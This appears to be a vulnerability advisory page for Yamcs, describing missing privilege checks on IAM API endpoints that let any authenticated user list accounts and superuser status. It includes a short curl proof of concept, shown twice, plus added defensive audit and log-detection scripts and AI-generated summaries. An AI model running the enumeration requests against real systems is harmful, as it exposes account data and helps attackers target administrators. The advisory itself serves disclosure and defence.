Yamcs vulnerable to unauthorized user enumeration via IAM API endpoints
Description
Summary
The IAM API endpoints (listUsers, getUser, listGroups, and getGroup) in yamcs-core do not enforce the required SystemPrivilege.ControlAccess check. As a result, any authenticated user (even those with low or no privileges) can enumerate all user accounts in the system, including their usernames, superuser status, and group memberships.
This constitutes a broken access control vulnerability (CWE-862) that leaks sensitive user information.
Root Cause
File: yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java:125,180,357,372
listUsers(), getUser(), listGroups(), and getGroup() do not require SystemPrivilege.ControlAccess. Any authenticated user — regardless of privileges — can enumerate all users, their superuser status, and group memberships:
```java
// listUsers — NO checkSystemPrivilege
public void listUsers(Context ctx, Empty request, ...) {
    var sensitiveDetails = ctx.user.hasSystemPrivilege(SystemPrivilege.ControlAccess);
    // sensitiveDetails=false for low-priv users, but name/superuser/active still exposed
    for (User user : users) {
        UserInfo userb = toUserInfo(user, sensitiveDetails, directory);
        responseb.addUsers(userb);
    }
}
```
Compare with properly protected endpoints:
```java
// createUser — correctly protected
public void createUser(Context ctx, ...) {
    ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // present
    ...
}
```
Impact
Any authenticated user can:
- List all user accounts in the system
- Identify which accounts have superuser privileges
- Use this information to target privileged accounts
Proof of Concept
```bash
# Authenticate as any low-privilege user to obtain an access_token
curl -s -X POST "http://localhost:8090/auth/token" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "grant_type=password&username=lowpriv&password=lowpriv123"

# Enumerate all users — no ControlAccess required
curl -s "http://TARGET:8090/api/users" \
  -H "Authorization: Bearer $TOKEN" # paste access_token from the response above
```
Output (confirmed):
```json
{
  "users": [
    { "name": "admin", "superuser": true, "active": true },
    { "name": "operator", "superuser": true, "active": true },
    { "name": "lowpriv", "superuser": false, "active": true }
  ]
}
```
Fix
Add ControlAccess check to listUsers, getUser, listGroups, getGroup:
```java
public void listUsers(Context ctx, Empty request, ...) {
    ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // ADD THIS
    ...
}
```
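The root cause is a class of defect, not a single line: an API handler that receives a `Context` but never calls `ctx.checkSystemPrivilege(...)` before touching directory data. The following audit script is an added example (not Yamcs project code) that scans Java source for handler methods taking `Context ctx` and classifies each one as `ok` (the privilege check is the first statement, as in the fix), `late` (the check exists but data is accessed before it) or `missing`. The embedded Java is a constructed sample modelled on the snippets above, not the real `IamApi.java`; the allowlist parameter is a hypothetical hook for endpoints that are intentionally open to every authenticated user.

```python
import re
from typing import Dict, FrozenSet, List

# Constructed Java sample modelled on this advisory's snippets; NOT the real IamApi.java.
# Two handlers lack the check, one has it first, one has it after a data access.
SAMPLE_JAVA = """\
public class IamApi extends AbstractIamApi<Context> {

    @Override
    public void listUsers(Context ctx, Empty request, Observer<ListUsersResponse> observer) {
        // vulnerable pattern: only the detail level depends on the privilege
        var sensitiveDetails = ctx.user.hasSystemPrivilege(SystemPrivilege.ControlAccess);
        var responseb = ListUsersResponse.newBuilder();
        for (User user : directory.getUsers()) {
            responseb.addUsers(toUserInfo(user, sensitiveDetails, directory));
        }
        observer.complete(responseb.build());
    }

    @Override
    public void createUser(Context ctx, CreateUserRequest request, Observer<UserInfo> observer) {
        ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess);
        observer.complete(toUserInfo(directory.addUser(request), true, directory));
    }

    @Override
    public void getUser(Context ctx, GetUserRequest request, Observer<UserInfo> observer) {
        User user = directory.getUser(request.getName());  // { braces in comments are ignored }
        observer.complete(toUserInfo(user, false, directory));
    }

    @Override
    public void deleteUser(Context ctx, DeleteUserRequest request, Observer<Empty> observer) {
        User user = directory.getUser(request.getName());   // data access before the check
        ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess);
        directory.deleteUser(user);
        observer.complete(Empty.getDefaultInstance());
    }
}
"""

# Line and block comments are stripped first so braces inside them cannot confuse
# the matcher. (String literals are not handled; good enough for an audit pass.)
COMMENT_RE = re.compile(r"//[^\n]*|/\*.*?\*/", re.DOTALL)
# Any public void method whose first parameter is `Context ctx` is treated as an API handler.
HANDLER_RE = re.compile(r"public\s+void\s+(\w+)\s*\(\s*Context\s+ctx\b[^)]*\)\s*\{")
CHECK_RE = re.compile(r"ctx\.checkSystemPrivilege\s*\(")


def _body_after(src: str, open_idx: int) -> str:
    """Return the text between the brace at open_idx and its matching closing brace."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    raise ValueError("unbalanced braces in source")


def classify_body(body: str) -> str:
    """'ok' if the privilege check is the first statement, 'late' if it appears
    later, 'missing' if it never appears."""
    statements = [s.strip() for s in body.split(";") if s.strip()]
    if statements and CHECK_RE.match(statements[0]):
        return "ok"
    if any(CHECK_RE.match(s) for s in statements):
        return "late"
    return "missing"


def audit_handlers(src: str, allowlist: FrozenSet[str] = frozenset()) -> Dict[str, str]:
    """Map every handler name to its classification."""
    src = COMMENT_RE.sub("", src)
    result: Dict[str, str] = {}
    for m in HANDLER_RE.finditer(src):
        name = m.group(1)
        body = _body_after(src, m.end() - 1)  # m.end()-1 is the opening brace
        result[name] = "allowlisted" if name in allowlist else classify_body(body)
    return result


def findings(src: str, allowlist: FrozenSet[str] = frozenset()) -> List[str]:
    """Handlers that should be reviewed: check missing or performed after data access."""
    return sorted(n for n, s in audit_handlers(src, allowlist).items() if s in ("missing", "late"))


if __name__ == "__main__":
    for name, status in audit_handlers(SAMPLE_JAVA).items():
        print(f"{name:12s} {status}")
    print("review:", findings(SAMPLE_JAVA))
```

Run against the sample, `findings` reports `deleteUser`, `getUser` and `listUsers`; `createUser` passes because the check is its first statement, which is exactly the shape the fix gives the four affected methods. Treating `late` as a finding matters: a check placed after a directory lookup still protects the response, but it lets an unprivileged caller trigger the lookup (and any side effects or timing differences it has) first.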
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authenticated users can enumerate all accounts and superuser flags via IAM API endpoints in yamcs-core that lack the required privilege check.
Vulnerability
The IAM API endpoints listUsers, getUser, listGroups, and getGroup in yamcs-core do not enforce the required SystemPrivilege.ControlAccess check [1][2]. Consequently, any authenticated user, even those with low or no privileges, can enumerate all user accounts in the system, including usernames, superuser status, and group memberships. The vulnerable code resides in yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java at lines 125, 180, 357, and 372 [1][2]. Affected versions are those prior to the fix that adds the missing privilege check.
Exploitation
An attacker needs only a valid authentication token for any low-privilege user on the system. No special privileges are required. The attacker can send GET requests to the IAM API endpoints (e.g., /api/users) and receive a JSON response containing all user accounts, their superuser status, and group memberships [1][2]. The official proof of concept uses curl with a token obtained from low-privilege credentials.
Impact
Successful exploitation allows an attacker to list all user accounts in the system, identify which accounts have superuser privileges, and use that information to target privileged accounts [1][2]. This is a broken access control vulnerability (CWE-862) that leaks sensitive user information [1][2]. No write or code execution is achieved, but the information disclosure significantly aids in further attacks.
Mitigation
A fix was released in yamcs-core that adds the missing ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess) call to the vulnerable endpoints [1][2]. As of the publication date (2026-05-27), users should upgrade to the patched version. No workarounds are documented; the only mitigation is to apply the update.
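Because no workaround exists short of upgrading, the useful interim control is visibility: which non-administrative accounts have been reading the IAM endpoints, and whether those reads succeeded (unpatched instance) or were denied (patched instance, attempt still worth noting). The detector below is an added example, not part of the advisory or of Yamcs; it assumes a simple one-line-per-request access-log format (`timestamp client-ip user method path status`) that is constructed for the example and may not match the real Yamcs log layout. A user reading only their own record is ignored, list endpoints are always reported, and individual-record reads are reported once they exceed a threshold.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, Set

# Constructed access-log lines in an ASSUMED format; Yamcs's real log layout may differ:
#   <timestamp> <client-ip> <authenticated-user> <method> <path> <status>
SAMPLE_LOG = """\
2026-05-27T10:00:01Z 10.0.0.5 lowpriv POST /auth/token 200
2026-05-27T10:00:02Z 10.0.0.5 lowpriv GET /api/users 200
2026-05-27T10:00:03Z 10.0.0.5 lowpriv GET /api/groups 200
2026-05-27T10:00:04Z 10.0.0.5 lowpriv GET /api/users/admin 200
2026-05-27T10:00:10Z 10.0.0.9 admin GET /api/users 200
2026-05-27T10:00:20Z 10.0.0.7 operator GET /api/users/operator 200
2026-05-27T10:01:00Z 10.0.0.8 intern GET /api/users 403
2026-05-27T10:01:01Z 10.0.0.8 intern GET /api/users/admin 403
2026-05-27T10:01:02Z 10.0.0.8 intern GET /api/users/operator 403
2026-05-27T10:01:03Z 10.0.0.8 intern GET /api/users/ops2 403
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)
# The four affected handlers map to these paths: collection reads and single-record reads.
IAM_LIST_RE = re.compile(r"^/api/(users|groups)/?$")
IAM_ITEM_RE = re.compile(r"^/api/(users|groups)/(?P<name>[^/]+)$")


def detect_iam_enumeration(lines: Iterable[str], privileged_users: Set[str],
                           item_threshold: int = 3) -> Dict[str, dict]:
    """Return, per non-privileged user, an alert describing IAM reads that look like
    enumeration: any list-endpoint read, or >= item_threshold distinct records that
    are not the user's own. 'outcome' is 'succeeded' if any such read returned 200."""
    list_paths = defaultdict(set)
    item_paths = defaultdict(set)
    statuses = defaultdict(set)
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m or m["method"] != "GET":
            continue
        user, path, status = m["user"], m["path"], int(m["status"])
        if user in privileged_users:  # administrators are expected to read the directory
            continue
        item = IAM_ITEM_RE.match(path)
        if IAM_LIST_RE.match(path):
            list_paths[user].add(path)
        elif item and item["name"] != user:  # reading your own record is normal
            item_paths[user].add(path)
        else:
            continue
        statuses[user].add(status)

    alerts: Dict[str, dict] = {}
    for user in set(list_paths) | set(item_paths):
        if list_paths[user] or len(item_paths[user]) >= item_threshold:
            alerts[user] = {
                "outcome": "succeeded" if 200 in statuses[user] else "denied",
                "list_endpoints": sorted(list_paths[user]),
                "item_reads": len(item_paths[user]),
            }
    return alerts


if __name__ == "__main__":
    for user, alert in detect_iam_enumeration(SAMPLE_LOG.splitlines(), {"admin"}).items():
        print(user, alert)
```

On the constructed sample, `lowpriv` is reported with outcome `succeeded` (the unpatched behaviour this advisory describes), `intern` is reported with outcome `denied` (what the same activity looks like after 5.12.7), `operator` is not reported because the only record read was their own, and `admin` is skipped as a privileged account. The privileged set should be taken from the directory itself (accounts holding `ControlAccess`), not hard-coded.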
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.yamcs:yamcs-core | Maven | < 5.12.7 | 5.12.7 |
Affected products: 2
Patches: 0 (No patches discovered yet.)
Vulnerability mechanics
Root cause
"Missing `SystemPrivilege.ControlAccess` authorization check on four IAM API endpoints allows any authenticated user to enumerate all user accounts."
Attack vector
An attacker who is already authenticated (even with low or no privileges) can call the IAM API endpoints `listUsers`, `getUser`, `listGroups`, or `getGroup` without needing the `SystemPrivilege.ControlAccess` privilege [ref_id=1][ref_id=2]. The attacker sends a simple HTTP GET request to `/api/users` (or similar paths) with a valid bearer token obtained from the `/auth/token` endpoint [ref_id=1][ref_id=2]. The server returns all user accounts including usernames, superuser status, and group memberships, enabling the attacker to identify and target privileged accounts [ref_id=1][ref_id=2].
Affected code
The vulnerable endpoints are in `yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java` at lines 125, 180, 357, and 372 [ref_id=1][ref_id=2]. The methods `listUsers()`, `getUser()`, `listGroups()`, and `getGroup()` all lack a `ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess)` call that is present on properly protected endpoints like `createUser()` [ref_id=1][ref_id=2].
What the fix does
The fix adds `ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess)` as the first line of each vulnerable method (`listUsers`, `getUser`, `listGroups`, `getGroup`) [ref_id=1][ref_id=2]. This mirrors the access control check already present on properly protected endpoints like `createUser()` [ref_id=1][ref_id=2]. By requiring the `ControlAccess` privilege before any user data is returned, the fix ensures that only authorized administrators can enumerate user accounts and their details.
Preconditions
- auth: Attacker must have a valid authenticated session (any user account, even low-privilege)
- network: The IAM API endpoints must be exposed and reachable over the network
- config: No special configuration is required; the bug is present in the default code path
Reproduction
```bash
# Authenticate as any low-privilege user to obtain an access token
curl -s -X POST "http://localhost:8090/auth/token" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "grant_type=password&username=lowpriv&password=lowpriv123"

# Enumerate all users — no ControlAccess required
curl -s "http://TARGET:8090/api/users" \
  -H "Authorization: Bearer $TOKEN"
```
The response includes all user accounts with their `name`, `superuser`, and `active` fields exposed [ref_id=1][ref_id=2].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 2
News mentions: 0 (No linked articles in our index yet.)